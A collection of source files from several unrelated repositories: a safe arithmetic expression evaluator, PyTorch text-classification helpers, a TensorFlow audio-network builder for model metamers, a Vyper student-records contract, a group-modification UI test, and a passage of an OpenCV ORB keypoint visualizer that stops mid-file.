| metadata (dict) | text (string, lengths 60–3.49M) |
|---|---|
{
"source": "Jenek209/4a0f9bca3ce79bd9b0a5fa6a95e134d0",
"score": 3
}
|
#### File: graphics_in_the_admin_panel_project/graphics_in_the_admin_panel_application/parser.py
```python
import ast
import operator as op
# supported operators
operators = {ast.Add: op.add, ast.Sub: op.sub, ast.Mult: op.mul,
ast.Div: op.truediv, ast.Pow: op.pow, ast.BitXor: op.xor,
ast.USub: op.neg}
def eval_expr(expr):
return eval_(ast.parse(expr, mode='eval').body)
def eval_(node):
if isinstance(node, ast.Num): # <number>
return node.n
elif isinstance(node, ast.BinOp): # <left> <operator> <right>
return operators[type(node.op)](eval_(node.left), eval_(node.right))
elif isinstance(node, ast.UnaryOp): # <operator> <operand> e.g., -1
return operators[type(node.op)](eval_(node.operand))
else:
raise TypeError(node)
```
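A quick usage sketch of the evaluator above (added, not part of the original gist); note that `^` maps to ast.BitXor, i.e. bitwise XOR rather than exponentiation:
```python
print(eval_expr("2**6"))          # 64
print(eval_expr("2^6"))           # 4 (bitwise XOR, not a power)
print(eval_expr("1 + 2*3 - -4"))  # 11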
|
{
"source": "jenellea/pytorchfundamentals",
"score": 2
}
|
#### File: pytorchfundamentals/nlp-pytorch/torchnlp.py
```python
import builtins
import torch
import torchtext
import collections
import os
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
vocab = None
tokenizer = torchtext.data.utils.get_tokenizer('basic_english')
def load_dataset(ngrams=1,min_freq=1):
global vocab, tokenizer
print("Loading dataset...")
train_dataset, test_dataset = torchtext.datasets.AG_NEWS(root='./data')
train_dataset = list(train_dataset)
test_dataset = list(test_dataset)
classes = ['World', 'Sports', 'Business', 'Sci/Tech']
print('Building vocab...')
counter = collections.Counter()
for (label, line) in train_dataset:
counter.update(torchtext.data.utils.ngrams_iterator(tokenizer(line),ngrams=ngrams))
vocab = torchtext.vocab.Vocab(counter, min_freq=min_freq)
return train_dataset,test_dataset,classes,vocab
def encode(x,voc=None,unk=0,tokenizer=tokenizer):
v = vocab if voc is None else voc
return [v.stoi.get(s,unk) for s in tokenizer(x)]
def train_epoch(net,dataloader,lr=0.01,optimizer=None,loss_fn = torch.nn.CrossEntropyLoss(),epoch_size=None, report_freq=200):
optimizer = optimizer or torch.optim.Adam(net.parameters(),lr=lr)
loss_fn = loss_fn.to(device)
net.train()
total_loss,acc,count,i = 0,0,0,0
for labels,features in dataloader:
optimizer.zero_grad()
features, labels = features.to(device), labels.to(device)
out = net(features)
loss = loss_fn(out,labels) #cross_entropy(out,labels)
loss.backward()
optimizer.step()
total_loss+=loss
_,predicted = torch.max(out,1)
acc+=(predicted==labels).sum()
count+=len(labels)
i+=1
if i%report_freq==0:
print(f"{count}: acc={acc.item()/count}")
if epoch_size and count>epoch_size:
break
return total_loss.item()/count, acc.item()/count
def padify(b,voc=None,tokenizer=tokenizer):
# b is the list of tuples of length batch_size
# - first element of a tuple = label,
# - second = feature (text sequence)
# build vectorized sequence
v = [encode(x[1],voc=voc,tokenizer=tokenizer) for x in b]
# compute max length of a sequence in this minibatch
l = max(map(len,v))
return ( # tuple of two tensors - labels and features
torch.LongTensor([t[0]-1 for t in b]),
torch.stack([torch.nn.functional.pad(torch.tensor(t),(0,l-len(t)),mode='constant',value=0) for t in v])
)
def offsetify(b,voc=None):
# first, compute data tensor from all sequences
x = [torch.tensor(encode(t[1],voc=voc)) for t in b]
# now, compute the offsets by accumulating the tensor of sequence lengths
o = [0] + [len(t) for t in x]
o = torch.tensor(o[:-1]).cumsum(dim=0)
return (
torch.LongTensor([t[0]-1 for t in b]), # labels
torch.cat(x), # text
o
)
def train_epoch_emb(net,dataloader,lr=0.01,optimizer=None,loss_fn = torch.nn.CrossEntropyLoss(),epoch_size=None, report_freq=200,use_pack_sequence=False):
optimizer = optimizer or torch.optim.Adam(net.parameters(),lr=lr)
loss_fn = loss_fn.to(device)
net.train()
total_loss,acc,count,i = 0,0,0,0
for labels,text,off in dataloader:
optimizer.zero_grad()
labels,text = labels.to(device), text.to(device)
if use_pack_sequence:
off = off.to('cpu')
else:
off = off.to(device)
out = net(text, off)
loss = loss_fn(out,labels) #cross_entropy(out,labels)
loss.backward()
optimizer.step()
total_loss+=loss
_,predicted = torch.max(out,1)
acc+=(predicted==labels).sum()
count+=len(labels)
i+=1
if i%report_freq==0:
print(f"{count}: acc={acc.item()/count}")
if epoch_size and count>epoch_size:
break
return total_loss.item()/count, acc.item()/count
```
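A minimal usage sketch for these helpers (added; meant to run in the same context as the module above and assuming the legacy torchtext release these calls target is installed). The tiny EmbeddingBag classifier is a hypothetical stand-in, not part of the course code:
```python
if __name__ == "__main__":
    train_dataset, test_dataset, classes, vocab = load_dataset()
    train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=16,
                                               shuffle=True, collate_fn=padify)
    net = torch.nn.Sequential(                  # hypothetical toy classifier
        torch.nn.EmbeddingBag(len(vocab), 32),  # mean-pools token embeddings
        torch.nn.Linear(32, len(classes))).to(device)
    loss, acc = train_epoch(net, train_loader, epoch_size=4000)
    print(f"loss={loss:.4f} acc={acc:.4f}")
```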
|
{
"source": "jenellefeather/model_metamers",
"score": 2
}
|
#### File: jenellefeather/model_metamers/build_word_network_reduced_aliasing.py
```python
import sys
import tfcochleagram
import tensorflow as tf
import numpy as np
import scipy.io.wavfile as wav
import pickle
import sys
import json
import os
import scipy
import matplotlib.pylab as plt
import audio_cnn_helpers
import metamer_helpers
# Jittered relu grad is only applied to the metamer generation layer.
# This modification to the gradient helps with optimization for the final layer.
@tf.custom_gradient
def jittered_relu_grad(x):
y = tf.nn.relu(x)
def grad(dy): # unlike the standard ReLU gradient, dy is passed through everywhere
dy_shape = dy.get_shape()
# Normal relu gradient is equivalent to tf.where(x<=0, 0*dy, 1*dy)
return tf.where(x<=0, dy, dy)
return y, grad
# Build our network
def build_net(_):
pckl_file = 'word_network_reduced_aliasing.pckl'
ckpt_path = 'word_reduced_aliasing.ckpt'
# Parameters to build the cochleagram input, same as used for training
signal_rate = 20000
signal_length_s = 2
COCH_PARAMS = {
"ENV_SR":200,
"HIGH_LIM":8000,
"LOW_LIM":20,
"N":50,
"SAMPLE_FACTOR":4,
"compression":"clipped_point3",
"rFFT":True,
"reshape_kell2018":False,
"erb_filter_kwargs":{'no_lowpass':False, 'no_highpass':False},
# Chosen to normalize a dataset a while ago and used to train these models
"scale_before_compression":796.87416837456942
}
net_name = 'word_reduced_aliasing'
# Load pickle containing the network specification
with open(pckl_file, 'rb') as f:
pckled_network = pickle.load(f)
# Make a variable input tensor (will be optimized)
input_tensor = tf.Variable(np.ones([1,signal_rate*signal_length_s]),
dtype=tf.float32)
trainable = False
training = False
nets = {'input_signal':input_tensor}
# Start a session so that we can easily load the variables.
sess = tf.Session()
# Make the cochleagram graph (input into the word neural network)
with tf.variable_scope('cochlear_network'):
coch_container = tfcochleagram.cochleagram_graph(nets,
signal_rate,
**COCH_PARAMS)
input_tensor = nets['cochleagram']
# Builds the network from the saved pckl for the audio network
with tf.variable_scope('brain_network'):
for layer_idx, layer in enumerate(pckled_network['layer_list']):
layer_name = pckled_network['graph_architecture'][layer_idx]['args']['name']
layer_type = pckled_network['graph_architecture'][layer_idx]['layer_type']
if layer_type == 'tf.layers.batch_normalization':
nets[layer_name]= layer(input_tensor, trainable=trainable, training=training)
elif layer_type == 'tf.layers.dropout':
nets[layer_name] = layer(input_tensor, training=training)
elif layer_type == 'tf.layers.conv2d':
nets[layer_name] = layer(input_tensor, trainable=trainable)
else:
nets[layer_name] = layer(input_tensor)
input_tensor = nets[layer_name]
# Load all of the variables in the scope "brain_network" (excludes the input signal)
brain_globals = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='brain_network')
brain_locals = tf.get_collection(tf.GraphKeys.LOCAL_VARIABLES, scope='brain_network')
# Load a checkpoint
saver = tf.train.Saver(var_list=brain_locals+brain_globals)
saver.restore(sess, ckpt_path)
nets['visualization_input'] = nets['cochleagram']
nets['logits'] = nets['fc_top']['/stimuli/word_int']
nets['predictions'] = tf.nn.softmax(nets['logits'])
# For experiments in Feather et al. 2019 we generated metamers matched to the ReLU after each conv
# or fully connected layer.
# This code applies a modified gradient relu after each.
for pre_layer in ['conv_0', 'conv_1', 'conv_2', 'conv_3', 'conv_4', 'fc_intermediate']:
layer_pre_relu = nets[pre_layer]
nets['%s_jittered_relu'%pre_layer] = jittered_relu_grad(layer_pre_relu)
# Choose the layers for the optimization
metamer_gen_layers = ['visualization_input',
'pool_0_0', # a hanning pooling layer after the stride=1 conv
'pool_1_0',
'conv_2_jittered_relu',
'conv_3_jittered_relu',
'conv_4_jittered_relu',
'fc_intermediate_jittered_relu',
'logits']
# Load in the encodings for this network
word_and_speaker_encodings = pickle.load(open('assets/metamer_word_encodings.pckl', 'rb'))
nets['idx_to_label'] = word_and_speaker_encodings['word_idx_to_word']
class_names = nets['idx_to_label']
nets['class_index_offset'] = 0
### Remaining code block runs some sanity checks with an example sound. ###
# Pull in an example sound that is classified correctly (it contains the word "human")
audio_path = 'assets/human_audio_resampled.wav'
wav_word = 'human'
audio_dict = metamer_helpers.use_audio_path_specified_audio(audio_path,
wav_word,
rms_normalize=0.1)
eval_predictions = sess.run(nets['predictions'],
feed_dict={nets['input_signal']: [audio_dict['wav']]}).ravel()
sorted_predictions = np.argsort(eval_predictions)[::-1]
prediction_check_msg = 'Predicted word for human example is %s with %f prob' % (
class_names[sorted_predictions[0] + nets['class_index_offset']],
eval_predictions[sorted_predictions[0]])
predicted_class = class_names[sorted_predictions[0] + nets['class_index_offset']]
assert predicted_class==wav_word, prediction_check_msg
# Make sure that the activations are the same between the normal relu and the modified gradient
# relu for an example layer.
same_layers = {'normal_relu':nets['relu_3'],
'modified_grad_relu':nets['conv_3_jittered_relu']}
check_relu = sess.run(same_layers, feed_dict={nets['input_signal']: [audio_dict['wav']]})
relu_check_msg = ('The activations after the modified gradient ReLU do not '
'match the activations after the normal gradient ReLU.')
assert np.all(check_relu['normal_relu'] == check_relu['modified_grad_relu']), relu_check_msg
return nets, sess, metamer_gen_layers
def main():
nets, session, metamer_gen_layers = build_net('_')
return nets, session, metamer_gen_layers
if __name__== "__main__":
main()
```
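The script above runs in TF1 graph mode; as an added, self-contained illustration of the pass-through gradient idea (assuming TensorFlow 2 in eager mode; this snippet is not part of the repository):
```python
import tensorflow as tf

@tf.custom_gradient
def passthrough_relu(x):
    y = tf.nn.relu(x)
    def grad(dy):
        # A standard ReLU gradient would be tf.where(x <= 0, 0.0 * dy, dy);
        # here dy flows through unchanged, even where x <= 0.
        return dy
    return y, grad

x = tf.constant([-2.0, 0.0, 3.0])
with tf.GradientTape() as tape:
    tape.watch(x)
    y = passthrough_relu(x)
print(tape.gradient(y, x).numpy())  # [1. 1. 1.]; a standard ReLU would give [0. 0. 1.]
```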
|
{
"source": "jenerestain/smart-student",
"score": 3
}
|
#### File: smart-student/contracts/student.v.py
```python
student: public({
balanceOf: currency_value, # cashier issued Philippine Peso-pegged token for e-transaction in PSHS
id_num: bytes32, # Registrar specified Id number (e.g. "13-63623")
enrolled: bool,
first_name: bytes32, # Legal first name
last_name: bytes32, # Legal last name
grade: decimal[6][8] # [year][subject number code]
}[address])
cashier: public(address)
reserve: num
def __init__(_cashier: address):
self.cashier = _cashier # Central token authority
self.reserve = 0 # Starting cash reserve in pesos
def setFinalGrade(_grade: decimal, _subject: num, _year: num):
assert self.student[msg.sender].enrolled # Throws if student is not yet enrolled
self.student[msg.sender].grade[_year][_subject] = _grade
@payable
def register(_id_num: bytes32, _first_name: bytes32, _last_name: bytes32):
assert not self.student[msg.sender].enrolled # Throws if user is already enrolled
# Adding identity data
self.student[msg.sender].id_num = _id_num
self.student[msg.sender].first_name = _first_name
self.student[msg.sender].last_name = _last_name
self.student[msg.sender].enrolled = True
def issuePeso(_amount: num, _to: address):
assert msg.sender == self.cashier # Throws if user is not the cashier
self.reserve += _amount # Add _amount to current reserve
def transfer(_to: address, _amount: currency_value):
assert self.student[msg.sender].balanceOf >= _amount # Throw if send amount greater than balance
self.student[msg.sender].balanceOf -= _amount
self.student[_to].balanceOf += _amount
```
|
{
"source": "Jenerishka/python_training",
"score": 2
}
|
#### File: python_training/test/test_modif_group.py
```python
from model.group import Group
def test_modification_first_group(app):
if app.group.count() == 0:
app.group.create(Group(name="Group for test modify group"))
old_groups = app.group.get_group_list()
group = Group(name="344fdf", header="dfdf",
footer="sfdfdfew")
group.id = old_groups[0].id
app.group.modif_first_group(group)
new_groups = app.group.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[0] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups,
key=Group.id_or_max)
def test_modification_first_group_name(app):
if app.group.count() == 0:
app.group.create(Group(name="Group for test modify group2"))
old_groups = app.group.get_group_list()
group = Group(name="New name")
group.id = old_groups[0].id
app.group.modif_first_group(group)
new_groups = app.group.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[0] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups,
key=Group.id_or_max)
# def test_modification_first_group_header(app):
# if app.group.count() == 0:
# app.group.create(Group(name="Group for test modify group3"))
# old_groups = app.group.get_group_list()
# app.group.modif_first_group(Group(header="New header"))
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
```
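For readers without the rest of this training project, the tests above rely on a Group model with an id_or_max sort key and value-based equality; a hypothetical minimal sketch (field and method names inferred from the test code) could look like this:
```python
import sys

class Group:
    def __init__(self, name=None, header=None, footer=None, id=None):
        self.name = name
        self.header = header
        self.footer = footer
        self.id = id

    def __eq__(self, other):
        # Equality on id and name is enough for the list comparisons in the tests
        return (self.id is None or other.id is None or self.id == other.id) and self.name == other.name

    def id_or_max(self):
        # Groups without an id sort after every group that has one
        return int(self.id) if self.id else sys.maxsize
```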
|
{
"source": "jenerous/orb-visualizor",
"score": 2
}
|
#### File: jenerous/orb-visualizor/orb-visualizer.py
```python
import cv2
import matplotlib.pyplot as plt
import numpy as np
import sys
import os
import math
import json
from time import sleep
# initial threshold for FAST feature (difference to center point)
iniThFast = 20
# reduce threshold for FAST, if not enough feature points were found to this
minThFast = 5
# original patch size for rotation estimation
PATCH_SIZE = 31
HALF_PATCH_SIZE = 15
# how wide shall the window image be
window_width = 1500
# initialize the fast detector, will be used later
fast = cv2.FastFeatureDetector_create(iniThFast, True)
pattern = json.load(open('pattern.json'))
# https://github.com/raulmur/ORB_SLAM2/blob/master/src/ORBextractor.cc#L150
modes = ["fast", "full", "pattern"]
def limit(val, lower, upper):
# clip given value to lower or upper limit
return min(upper, max(lower, val))
def pixel_circle(r):
# find out which points belong to a pixel circle of radius r around a given point
d = round(math.pi - (2 * r))
x = 0
y = r
cpoints = []
while x <= y:
cpoints.append((x, -y))
cpoints.append((y, -x))
cpoints.append((y, x))
cpoints.append((x, y))
cpoints.append((-x, y))
cpoints.append((-y, x))
cpoints.append((-y, -x))
cpoints.append((-x, -y))
if d < 0:
d += (math.pi * x) + (math.pi * 2)
else:
d += math.pi * (x - y) + (math.pi * 3)
y -= 1
x += 1
return list(set(cpoints))
def calc_umax():
# This relates to https://github.com/raulmur/ORB_SLAM2/blob/f2e6f51cdc8d067655d90a78c06261378e07e8f3/src/ORBextractor.cc#L452
# This is for orientation
# pre-compute the end of a row in a circular patch
umax = [0] * (HALF_PATCH_SIZE + 1)
vmax = int(np.floor(HALF_PATCH_SIZE * np.sqrt(2) / 2 + 1))
vmin = int(np.ceil(HALF_PATCH_SIZE * np.sqrt(2) / 2))
hp2 = HALF_PATCH_SIZE * HALF_PATCH_SIZE
for v in range(vmax + 1):
umax[v] = int(np.round(np.sqrt(hp2 - v * v)))
# Make sure we are symmetric
v0 = 0
for v in range(HALF_PATCH_SIZE, vmin-1, -1):
while umax[v0] == umax[v0 + 1]:
v0 += 1
umax[v] = v0
v0 += 1
print('umax:', umax)
return umax
def IC_Angle(image, pt, u_max):
# this relates to https://github.com/raulmur/ORB_SLAM2/blob/master/src/ORBextractor.cc#L77
if image.ndim > 2:
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
cpx = int(round(pt[1]))
cpy = int(round(pt[0]))
print('cpx/y/val', cpx, cpy, image[cpy, cpx])
m_01 = int(0)
# Treat the center line differently, v=0
m_10 = sum([u * image[cpy, cpx + u] for u in range(-HALF_PATCH_SIZE, HALF_PATCH_SIZE + 1)])
m_00 = sum([image[cpy, cpx + u] for u in range(-HALF_PATCH_SIZE, HALF_PATCH_SIZE + 1)])
# Go line by line in the circular patch
for v in range(1, HALF_PATCH_SIZE + 1):
# Proceed over the two lines
v_sum = 0
d = u_max[v]
for u in range(-d, d + 1):
val_plus = int(image[cpy + v, cpx + u])
val_minus = int(image[cpy - v, cpx + u])
v_sum += (val_plus - val_minus)
m_10 += u * (val_plus + val_minus)
m_00 += val_plus + val_minus
m_01 += v * v_sum
# print('m_01, m_10, m_00', m_01, m_10, m_00)
angle = cv2.fastAtan2(m_01, m_10)
if m_00 == 0 or not m_00:
centerpoint_x = 0
centerpoint_y = 0
else:
centerpoint_x = int(m_10/m_00)
centerpoint_y = int(m_01/m_00)
return angle, centerpoint_x + HALF_PATCH_SIZE, centerpoint_y + HALF_PATCH_SIZE
def put_text_on_enlarged(text, x, y, thickness=1):
# a wrapper for positioning text in the upscaled version of the image
global overlay, canvas, resized
textsize = cv2.getTextSize(text, fontFace=cv2.FONT_HERSHEY_DUPLEX, fontScale=text_scale, thickness=thickness)[0]
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + x * f) + (canvas.shape[1] - ls * resized.shape[1] + (x + 1) * f)) / 2)
xshift -= textsize[0] // 2
yshift = int(y * f + f / 2)
yshift += textsize[1] // 2
overlay = cv2.putText(
overlay,
text,
(xshift , yshift),
cv2.FONT_HERSHEY_COMPLEX,
text_scale,
(255),
thickness=thickness
)
# start of main
source = ""
while source != "q":
source = input("Filepath or camera index: ")
try:
source = int(source)
in_mode = 'live'
webcam = cv2.VideoCapture(source)  # open the camera index the user entered
ret, video_frame = webcam.read()
video_frame = cv2.flip(video_frame, 1)
fast_ex = cv2.cvtColor(video_frame, cv2.COLOR_BGR2GRAY)
break
except:
if os.path.exists(source.strip()):
in_mode = 'file'
fast_ex = cv2.imread(source.strip(), cv2.IMREAD_GRAYSCALE)
break
else:
print("Could not find given path or Camera Device for {}".format(source))
exit()
center = (fast_ex.shape[0] // 2 , fast_ex.shape[1] // 2)
mode = modes[0]
umax = calc_umax()
while True:
if in_mode == 'live':
ret, video_frame = webcam.read()
video_frame = cv2.flip(video_frame, 1)
fast_ex = cv2.cvtColor(video_frame, cv2.COLOR_BGR2GRAY)
# circle radius
r = HALF_PATCH_SIZE
# calculate the text scale based on the radius (interpolated from two example values)
text_scale = -0.04*r+0.87
# how many pixels to pad around the circle
padding = 2
# the representation of the cropped area shall be *scale* times larger than the original height
# keeping cropped separate, to later iterate over it
scale = 1.2
cropped = fast_ex[center[0]-r-padding:center[0]+r+padding+1,
center[1]-r-padding:center[1]+r+padding+1]
resized = cv2.resize(cropped, (int(fast_ex.shape[0] *scale), int(fast_ex.shape[0]*scale)), interpolation=cv2.INTER_NEAREST)
vKeysCell = fast.detect(fast_ex[center[0]-r-padding:center[0]+r+padding+1,
center[1]-r-padding:center[1]+r+padding+1])
# create a new canvas, to paste everything into
canvas = np.ndarray((resized.shape[0], fast_ex.shape[1]+20+resized.shape[1]))
canvas.fill(255)
# where to paste the original image
paste_x1 = 0
paste_x2 = fast_ex.shape[1]
paste_y1 = int(canvas.shape[0] / 2 - fast_ex.shape[0] / 2)
paste_y2 = int(canvas.shape[0] / 2 - fast_ex.shape[0] / 2 + fast_ex.shape[0])
# paste original image
canvas[paste_y1: paste_y2, paste_x1:paste_x2] = fast_ex
# paste resized crop
canvas[:, -resized.shape[1]:] = resized
# scale up everything to make lines smoother
ls = int(np.ceil(window_width/canvas.shape[1]))
canvas = cv2.resize(canvas, (0, 0), fx=ls, fy=ls, interpolation=cv2.INTER_NEAREST)
# pasting things into an overlay, to later increase contrast (black & white)
overlay = np.ndarray(canvas.shape)
# use 128 to indicate empty spaces later
overlay.fill(128)
# line from rectangle to top left corner of crop
overlay = cv2.line(
overlay,
(ls * (paste_x1 + center[1]+r+padding), ls * (paste_y1 + center[0]-r-padding)),
(canvas.shape[1] - ls * resized.shape[1], 0), (255),
thickness=2
)
# line from rectangle to bottom left corner of crop
overlay = cv2.line(
overlay,
(ls * (paste_x1 + center[1]+r+padding+1), ls * (paste_y1 + center[0]+r+padding+1)),
(canvas.shape[1]- ls * resized.shape[1], canvas.shape[0]), (255),
thickness=2
)
# rectangle to indicate crop in original image
overlay = cv2.rectangle(
overlay,
(ls * (paste_x1 + center[1]-r-padding), ls * (paste_y1 + center[0]-r-padding)),
(ls * (paste_x1 + center[1]+r+padding+1), ls * (paste_y1 + center[0]+r+padding+1)), (255),
thickness=2
)
# scale factor from original crop to resized version, after scaling up everything
f = (resized.shape[0]) / cropped.shape[0] * ls
pc = pixel_circle(r)
# create vertical lines
for cx in range(cropped.shape[1]):
xshift = int(canvas.shape[1] - ls * resized.shape[1] + cx * f )
overlay = cv2.line(
overlay,
(xshift, 0),
(xshift, canvas.shape[0]),
255
)
# create horizontal lines
for cy in range(cropped.shape[0]):
overlay = cv2.line(
overlay,
(canvas.shape[1] - ls * resized.shape[1], int((1+cy) * f)),
(canvas.shape[1], int((1+cy) * f)),
255
)
# outer circle
overlay = cv2.circle(
overlay,
(int(canvas.shape[1] - ls * resized.shape[1] + cropped.shape[1] / 2 * f ), int(cropped.shape[0] / 2 * f)),
int((r + 0.6) * f),
255
)
# inner circle
overlay = cv2.circle(
overlay,
(int(canvas.shape[1] - ls * resized.shape[1] + cropped.shape[1] / 2 * f ), int(cropped.shape[0] / 2 * f)),
int((r - 0.55) * f),
255
)
if mode == "full":
# circle through all points of the circle and insert the values
for cy in range(-r, r + 1):
yp = [p[0] for p in pc if p[1] == cy]
yshift = cy+r+padding
for cx in range(min(yp), max(yp)+1):
# calculating center of upscaled pixels, with respect to the text size
thick = 1 # 2 if cy == 0 and cx == 0 else 1
textsize = cv2.getTextSize(str(cropped[cy+r+padding, cx+r+padding]), fontFace=cv2.FONT_HERSHEY_DUPLEX, fontScale=text_scale, thickness=thick)[0]
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + (cx+r+padding) * f) + (canvas.shape[1] - ls * resized.shape[1] + (cx + r + padding + 1) * f)) / 2)
xshift -= textsize[0] // 2
yshift = int((cy+r+padding) * f + f / 2)
yshift += textsize[1] // 2
overlay = cv2.putText(
overlay,
str(cropped[cy+r+padding, cx+r+padding]),
(xshift , yshift),
cv2.FONT_HERSHEY_COMPLEX,
text_scale,
(255),
thickness=thick
)
if cy == 0 and cx == 0:
overlay = cv2.rectangle(
overlay,
(overlay.shape[1] - int((r+1+padding) * f + 2), int((r+padding) * f)),
(overlay.shape[1] - int((r+padding) * f - 1), int((r+1+padding) * f)),
(255),
2
)
elif mode == "fast":
# show which pixels would count into the FAST feature detection
# put values of pixels into cropped / resized image
for cx in range(cropped.shape[1]):
for cy in range(cropped.shape[0]):
if (cx-r-padding, cy-r-padding) in pc or (cx-r-padding == 0 and cy-r-padding == 0):
put_text_on_enlarged(str(cropped[cy, cx]), cx, cy)
if (cx-r-padding == 0 and cy-r-padding == 0):
# add info to point in the center
put_text_on_enlarged("[p]", cx+0.75, cy+0.25,thickness=2)
nb_angle = 2 * np.pi / len(pc)
r_plus = 1.15
for nb, nba in enumerate(np.arange(0.0, 2 * np.pi, nb_angle)):
textsize = cv2.getTextSize('[{}]'.format(nb + 1), fontFace=cv2.FONT_HERSHEY_DUPLEX, fontScale=text_scale, thickness=2)[0]
nba_x = int(np.sin(nba) * (r + r_plus) * f - overlay.shape[0] / 2 + overlay.shape[1] - textsize[0] / 2)
nba_y = int(-np.cos(nba) * (r + r_plus) * f + overlay.shape[0] / 2 + textsize[1] / 2)
overlay = cv2.putText(
overlay,
'[{}]'.format(nb + 1),
(nba_x, nba_y),
cv2.FONT_HERSHEY_COMPLEX,
text_scale,
(255),
thickness=2
)
elif mode == "pattern":
# show the first x pattern overlayed
pmax = 10
descriptor = []
d_count = 0
for a_x, a_y, b_x, b_y in pattern:
if a_x > padding + r or a_x < - padding - r or \
a_y > padding + r or a_y < - padding - r or \
b_x > padding + r or b_x < - padding - r or \
b_y > padding + r or b_y < - padding - r:
continue
if d_count > pmax:
break
if fast_ex[center[0]+ a_y, center[1]+ a_x] < fast_ex[center[0]+ b_y, center[1]+ b_x]:
descriptor.append("1")
put_text_on_enlarged("{}a".format(d_count), a_x+padding+r, a_y+padding+r)
put_text_on_enlarged("{}b".format(d_count), b_x+padding+r, b_y+padding+r, thickness=2)
else:
descriptor.append("0")
# if fast_ex[center[0]+ a_y, center[1]+ a_x] == fast_ex[center[0]+ b_y, center[1]+ b_x]:
# put_text_on_enlarged("{}a".format(d_count), a_x+padding+r, a_y+padding+r)
# else:
put_text_on_enlarged("{}a".format(d_count), a_x+padding+r, a_y+padding+r, thickness=2)
put_text_on_enlarged("{}b".format(d_count), b_x+padding+r, b_y+padding+r)
d_count += 1
# Also print this onto the image
overlay = cv2.putText(
overlay,
"Descriptor: " + " | ".join(descriptor) + " ...",
(20, overlay.shape[0] - 20),
cv2.FONT_HERSHEY_COMPLEX,
text_scale,
(255),
thickness=1
)
print("Descriptor: " + " | ".join(descriptor) + " ...")
# turning overlay into white (255) pixels, where the underlying image is darker
# and into black (0) pixels, where the underlying image is lighter
overlay[overlay != 128] = np.where(canvas > 150, 50, 200)[overlay != 128]
# pasting in the overlay
canvas[overlay != 128] = overlay[overlay != 128]
# calculate the momentums and angle of a circular patch
a, cpx, cpy = IC_Angle(fast_ex, center, umax)
print("returned", a, cpx, cpy, np.sin(np.deg2rad(a)), np.cos(np.deg2rad(a)))
# initialize an RGB canvas
rgb = cv2.cvtColor(canvas.astype('uint8'), cv2.COLOR_GRAY2BGR)
# draw a line according to the angle
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + (padding + r) * f) + (canvas.shape[1] - ls * resized.shape[1] + ((padding + r) + 1) * f)) / 2)
yshift = int((padding + r) * f + f / 2)
r_red = 1
# drawing reference line and arc
rgb = cv2.line(rgb,
(xshift, yshift),
(int(xshift + (r - r_red) * f), yshift),
(255, 200, 128), 3)
rgb = cv2.ellipse(rgb, (xshift, yshift), ( int((r-r_red-1) * f), int((r-r_red-1) * f)),
0, 0, a, (210, 50, 128), 3)
# drawing arrow
a_x = int(np.cos(np.deg2rad(a)) * (r - r_red) * f - overlay.shape[0] / 2 + overlay.shape[1])
a_y = int(np.sin(np.deg2rad(a)) * (r - r_red) * f + overlay.shape[0] / 2)
rgb = cv2.line(rgb,
(xshift, yshift),
(a_x, a_y),
(128, 150, 0), 3)
a_x_l = int(np.cos(np.deg2rad((a - 150) % 360)) * (1) * f + a_x)
a_y_l = int(np.sin(np.deg2rad((a - 150) % 360)) * (1) * f + a_y)
rgb = cv2.line(rgb,
(a_x, a_y),
(a_x_l, a_y_l),
(128, 150, 0), 3)
a_x_r = int(np.cos(np.deg2rad(a + 150)) * (1) * f + a_x)
a_y_r = int(np.sin(np.deg2rad(a + 150)) * (1) * f + a_y)
rgb = cv2.line(rgb,
(a_x, a_y),
(a_x_r, a_y_r),
(128, 150, 0), 3)
cpx += padding
cpy += padding
# add the angle
rgb = cv2.putText(rgb,
'{:.2f}'.format(a),
(int(xshift + (r - r_red) * f), int(yshift + f / 2)),
cv2.FONT_HERSHEY_COMPLEX,
text_scale * 2,
(255, 200, 128),
2
)
# draw centroid
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + cpx * f) + (canvas.shape[1] - ls * resized.shape[1] + (cpx + 1) * f)) / 2)
yshift = int(cpy * f + f / 2)
rgb = cv2.circle(rgb,
(
xshift,
yshift
), 3,(50, 80, 255), 3)
rgb = cv2.putText(rgb,
"C",
(int(xshift + f), int(yshift + f)),
cv2.FONT_HERSHEY_COMPLEX,
text_scale * 2,
(50, 80, 255),
2
)
# draw keypoints
vKeysCellShifted = []
for vit in vKeysCell:
xshift = int(((canvas.shape[1] - ls * resized.shape[1] + vit.pt[0] * f) + (canvas.shape[1] - ls * resized.shape[1] + (vit.pt[0] + 1) * f)) / 2)
yshift = int(vit.pt[1] * f + f / 2)
vit.pt = (xshift, yshift)
vKeysCellShifted.append(vit)
rgb = cv2.drawKeypoints(rgb, vKeysCellShifted, rgb, (255, 0, 0))
# add some information beneath the image
rgb_info = np.zeros((rgb.shape[0] + 50, rgb.shape[1], rgb.shape[2]), dtype=np.uint8)
rgb_info[:rgb.shape[0], :, :] = rgb
rgb_info = cv2.putText(
rgb_info,
'PATCH: {} | KP: {} || w, a, s, d to position center || +/- to in/decrease patch size || q to quit'.format(PATCH_SIZE, len(vKeysCellShifted)),
(20, rgb.shape[0] + 35),
cv2.FONT_HERSHEY_COMPLEX,
1,
(255, 255, 255)
)
# rescale the window
fscale = window_width / rgb_info.shape[1]
fscale = 1.0 if fscale > 1 else fscale
rgb_info = cv2.resize(rgb_info, (0, 0), fx=fscale, fy=fscale, interpolation=cv2.INTER_LINEAR)
cv2.imshow('rgb', rgb_info)
pressedKey = cv2.waitKey(1) & 0xFF
if pressedKey == ord('q'):
# quit
cv2.destroyAllWindows()
break
if pressedKey == ord('w'):
# set center pixel one higher
center = (center[0] - 1, center[1])
continue
if pressedKey == ord('s'):
# set center pixel one lower
center = (center[0] + 1, center[1])
continue
if pressedKey == ord('a'):
# set center pixel one left
center = (center[0], center[1] - 1)
continue
if pressedKey == ord('d'):
# set center pixel one right
center = (center[0], center[1] + 1)
continue
if pressedKey == ord('m'):
# toggle through modes
